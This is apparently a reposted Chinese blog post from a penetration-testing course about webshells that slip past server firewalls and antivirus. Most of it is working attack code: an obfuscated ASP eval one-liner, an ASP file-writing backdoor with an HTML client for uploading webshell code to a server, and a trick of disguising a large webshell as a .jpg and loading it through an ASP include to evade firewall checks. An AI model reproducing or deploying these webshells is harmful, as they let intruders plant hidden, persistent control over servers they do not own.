欢迎光临散文网 会员登陆 & 注册

渗透测试 - 突破防火墙免杀一句话 -cracer哔哩哔哩

2023-07-16 13:13 作者:鬼谷_卫庄  | 我要投稿

asp免杀一句话<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>

复制代码穿透防火墙的bs小马


服务器装有 8Signs Firewall 防火墙的,PHP、ASP、ASPX 很多小马大马都不能用,所以这里推荐用BS 的马。。。


小马的接收端:


--------------------------------------


<%


On Error Resume Next


set gl=server.CreateObJeCt("Adodb.Stream") 


gl.Open 


gl.Type=2


gl.CharSet="gb2312" 


gl.writetext request("code")


gl.SaveToFile server.mappath(request("path")),2 


gl.Close 


set gl=nothing 


response.redirect request("path")


%>


-----------------------------------------------------


小马的发送端,aspshelluP.Html:


------------------------------------------------------


<html>


<head>


<meta http-equiv="Content-Type" content="text/html; charset=gb2312">


<title>Asp shell up Client</title>


</head>


<style>


BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}input { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px;}textarea { font-family: "Courier New";}td { border-right-width: 1px; border-bottom-width: 1px; border-right-style: solid; border-bottom-style: solid; border-top-color: #d8d8f0;}.trHead { background-color: #e4e4f3; line-height: 3px;}.STYLE5 {font-family: Arial, Helvetica, sans-serif; font-size: 11pt;}


</style>


<body>


<table width="780" border="0" align="center" cellpadding="0" cellspacing="0">


<tr>


<td height="22" class="td" align="center" >&nbsp;<span class="STYLE5">Asp shell up Client </span> </td>


</tr>


<tr>


<td class="trHead">&nbsp;</td>


</tr>


<td align="center" class="td">&nbsp;</td>


<tr>


<td height="18" align="center" class="td">


<FORM method=post target=_blank>ShellUrl: <INPUT 


style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" 


size=58 value=http://127.0.0.1/s.asp name=act> Path: <INPUT 


style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" 


size=8 value="4.txt" name=path> <INPUT onClick="Javascipt:name=path.value;action=document.all.act.value;submit();" type=button value="Submit" name=Send><BR>


发送的webshell代码:  


<BR><TEXTAREA style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" name=code rows=20 cols=85></TEXTAREA>


</FORM>


</td>


</tr>


<tr>


<td align="right" class="td"> Powered By <a href="#" title="点击复制服务端到剪贴版" onclick='window.clipboardData.setData("text","\<%\nOn Error Resume Next\nset gl=server.CreateObJeCt(\"Adodb.Stream\") \ngl.Open \ngl.Type=2\ngl.CharSet=\"gb2312\" \ngl.writetext request(\"code\")\ngl.SaveToFile server.mappath(request(\"path\")),2 \ngl.Close \nset gl=nothing \nresponse.redirect request(\"path\")\n%\>");alert("\服务端已成功复制到剪贴")'>[Copy code]</a>&nbsp;4ngr7 &nbsp;&nbsp;</td>


</tr><tr><td class="trHead">&nbsp;</td></tr>


</table>


</body>


</html>

复制代码还有就是先把你需要上传的大马名字改为xxx.jpg一些防火墙不检测图片的。

然后新建一个ASP内容为内容是<!--#include file="xxx.jpg" --> 

之后就成功包含了!


渗透测试 - 突破防火墙免杀一句话 -cracer哔哩哔哩的评论 (共 条)

分享到微博请遵守国家法律